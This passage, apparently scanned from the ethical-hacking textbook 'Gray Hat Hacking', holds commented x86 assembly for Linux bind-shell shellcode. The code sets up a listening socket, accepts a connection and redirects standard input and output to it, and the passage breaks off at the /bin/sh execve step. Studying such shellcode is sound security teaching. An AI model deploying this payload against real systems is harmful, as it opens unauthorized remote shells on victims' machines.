family:02,& any 2bytes:BB
mov ecx,esp ; move addr struct (on stack) to ecx
push byte 0x10 ; begin the bind args, push 16 (size) on stack
push ecx ; save address of struct back on stack
push esi ; save server file descriptor (now in esi) to stack
mov ecx,esp ; set addr of array as 2nd arg to socketcall
inc bl ; set bl to # 2, first arg of socketcall
mov al,102 ; call socketcall # 2: SYS_BIND
int 0x80 ; jump into kernel mode, execute the syscall
;listen(server, 0)
push edx ; still zero, used to terminate the next value pushed
push esi ; file descriptor for server (esi) pushed to stack
mov ecx,esp ; set addr of array as 2nd arg to socketcall
Gray Hat Hacking: The Ethical Hacker??™s Handbook
224
mov bl,0x4 ; move 4 into bl, first arg of socketcall
mov al,102 ; call socketcall #4: SYS_LISTEN
int 0x80 ; jump into kernel mode, execute the syscall
;client=accept(server, 0, 0)
push edx ; still zero, third argument to accept pushed to stack
push edx ; still zero, second argument to accept pushed to stack
push esi ; saved file descriptor for server pushed to stack
mov ecx,esp ; args placed into ecx, serves as 2nd arg to socketcall
inc bl ; increment bl to 5, first arg of socketcall
mov al,102 ; call socketcall #5: SYS_ACCEPT
int 0x80 ; jump into kernel mode, execute the syscall
; prepare for dup2 commands, need client file handle saved in ebx
mov ebx,eax ; copied returned file descriptor of client to ebx
;dup2(client, 0)
xor ecx,ecx ; clear ecx
mov al,63 ; set first arg of syscall to 0x63: dup2
int 0x80 ; jump into
;dup2(client, 1)
inc ecx ; increment ecx to 1
mov al,63 ; prepare for syscall to dup2:63
int 0x80 ; jump into
;dup2(client, 2)
inc ecx ; increment ecx to 2
mov al,63 ; prepare for syscall to dup2:63
int 0x80 ; jump into
;standard execve("/bin/sh".
Pages:
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430